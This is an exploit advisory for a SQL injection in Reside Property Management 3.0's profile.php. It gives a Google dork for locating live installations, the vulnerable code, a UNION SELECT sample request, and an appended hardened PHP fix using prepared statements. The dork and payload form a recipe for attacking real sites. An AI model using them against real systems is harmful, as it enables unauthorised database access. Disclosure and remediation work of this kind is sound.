Reside Property Management 3.0 SQL Injection

2020-06-30T00:00:00
ID PACKETSTORM:158245
Type packetstorm
Reporter AmirMohammad Safari
Modified 2020-06-30T00:00:00

Description

                                        
`# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection  
# Date: 2020-06-28  
# Google Dork: "Copyright 2020 Reside Property Management"  
# Exploit Author: Ultra Security Team (Ashkan Moghaddas, AmirMohammad Safari)  
# Team Members: Behzad Khalifeh, Milad Ranjbar  
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/  
# Version: v3.0 [Final Version]  
# Tested on: Windows/Linux  
# CVE: N/A  
  
.:: Description ::.  
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.  
  
  
.:: Vulnerable File ::.  
profile.php  
  
  
.:: Vulnerable Code ::.  
- Line 21: $profile = $_GET['profile'];  
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);  
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";  
- Line 91: $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());  
  
  
.:: Proof Of Concept (PoC) ::.  
Step 1 - Find Your Target With the above Dork.  
Step 2 - Find profile.php File in Target  
Step 3 - Inject Your Payloads in profile parameter  
  
  
.:: Sample Request ::.  
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23  
  
`
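
A hardened form of the lookup quoted under "Vulnerable Code" (lines 21-22 and 90-91 of profile.php), added here as an example; it is not the vendor's code and not part of the original advisory. It assumes an open `$mysqli` connection and the mysqlnd driver (needed for `get_result()`); the helper name `find_admin_by_name` and the 100-character limit are hypothetical.

```php
<?php
// Added example, not vendor code. Assumes $mysqli is an open mysqli
// connection, as in the quoted lines of profile.php.

// Make mysqli throw exceptions instead of returning false silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Hypothetical helper: fetch one admin row by name with a bound parameter,
 * so the value is never parsed as part of the SQL statement.
 */
function find_admin_by_name(mysqli $mysqli, string $profile): ?array
{
    // Same dash-to-space transform as line 22 of profile.php.
    $adminsName = str_replace('-', ' ', $profile);

    // Assumed policy: reject empty or implausibly long names early.
    if ($adminsName === '' || strlen($adminsName) > 100) {
        return null;
    }

    // Replaces the string concatenation on line 90.
    $stmt = $mysqli->prepare('SELECT * FROM admins WHERE adminName = ?');
    $stmt->bind_param('s', $adminsName);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

try {
    // Arrays such as ?profile[]=x are treated as missing input.
    $raw = $_GET['profile'] ?? '';
    $profile = is_string($raw) ? $raw : '';

    $admin = find_admin_by_name($mysqli, $profile);
    if ($admin === null) {
        http_response_code(404);
        exit('Profile not found');
    }
} catch (mysqli_sql_exception $e) {
    // Log server-side; do not echo the database error to the client,
    // which is what the die(... mysqli_error()) on line 91 does.
    error_log('profile.php query failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error');
}
```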